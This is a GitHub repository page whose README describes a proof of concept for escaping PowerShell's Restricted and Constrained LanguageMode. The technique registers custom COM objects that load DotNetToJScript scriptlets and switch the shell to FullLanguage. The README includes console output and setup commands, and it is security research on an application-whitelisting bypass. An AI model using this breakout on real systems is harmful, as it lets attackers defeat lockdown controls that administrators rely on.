Skip to content

FuzzySecurity/DotNetToJScript-LanguageModeBreakout

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits

PLM

PLM

 
 

DisableRL.png

DisableRL.png

 
 

DisableRL.sct

DisableRL.sct

 
 

EnableRL.png

EnableRL.png

 
 

EnableRL.sct

EnableRL.sct

 
 

README.md

README.md

 
 

Stage-RLTestCase.ps1

Stage-RLTestCase.ps1

 
 

Repository files navigation

DotNetToJScript Constrained/Restricted LanguageMode Breakout

This repository is based on a post by @xpn, more details available here.

Xpn's post outlines a bug of sorts where ConstrainedLanguage, when enforced through AppLocker does not prevent COM invocation. Because of this it is possible to define a custom COM object in the registry and force PowerShell to load a Dll. On load it is possible to change the LanguageMode to FullLanguage and break out of the restricted shell.

This repo is a variation on this technique where a DotNetToJScript scriptlet is used to directly stage a .Net assembly into the PowerShell process.

Notes

There is a similar bug to the one outlined above. While it is not possible to invoke COM objects from ConstrainedLanguage, for some reason this does not apply to RestrictedLanguage.

# ConstrainedLanguage
PS C:\> $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
PS C:\> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
PS C:\> New-Object -ComObject WScript.Shell
New-Object : Cannot create type. Only core types are supported in this language mode.
At line:1 char:1
+ New-Object -ComObject WScript.Shell
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (:) [New-Object], PSNotSupportedException
    + FullyQualifiedErrorId : CannotCreateComTypeConstrainedLanguage,Microsoft.PowerShell.Commands.NewObjectCommand

# RestrictedLanguage
PS C:\> $ExecutionContext.SessionState.LanguageMode = "RestrictedLanguage"
PS C:\> $ExecutionContext.SessionState.LanguageMode
At line:1 char:1
+ $ExecutionContext.SessionState.LanguageMode
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Property references are not allowed in restricted language mode or a Data section.
PS C:\Users\b33f> New-Object -ComObject WScript.Shell

SpecialFolders     CurrentDirectory
--------------     ----------------
System.__ComObject C:\Users\b33f

As a result this is also a breakout for RestrictedLanguage mode which is demonstrated in this POC. It should be noted that being "allowed to invoke COM objects" is actually inconsequential because it is trivial to hijack and existing HKCU COM reference.. yolo..

Instructions

Either compile PLM.dll and create scriptlets for PLM.SetRL/PLM.KillRL or use the pre-generated scriptlets (tested only on RS3/RS4). The repo includes a PowerShell script to set up and clean up the registry entries for the POC.

# Set up
PS C:\> . .\Stage-RLTestCase.ps1
PS C:\> Stage-RLTestCase -EnableRLSCT C:\Full\Path\EnableRL.sct -DisableRLSCT C:\Full\Path\DisableRL.sct

# Clean
PS C:\> Stage-RLTestCase -Clean

After running Stage-RLTestCase you should be able to issue the following command and get a MsgBox popup.

New-Object -ComObject EnableRL

EnableRL

To disable RestrictedLanguage simply issue the following command.

New-Object -ComObject DisableRL

DisableRL

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

26 stars

Watchers

4 watching

Forks

14 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages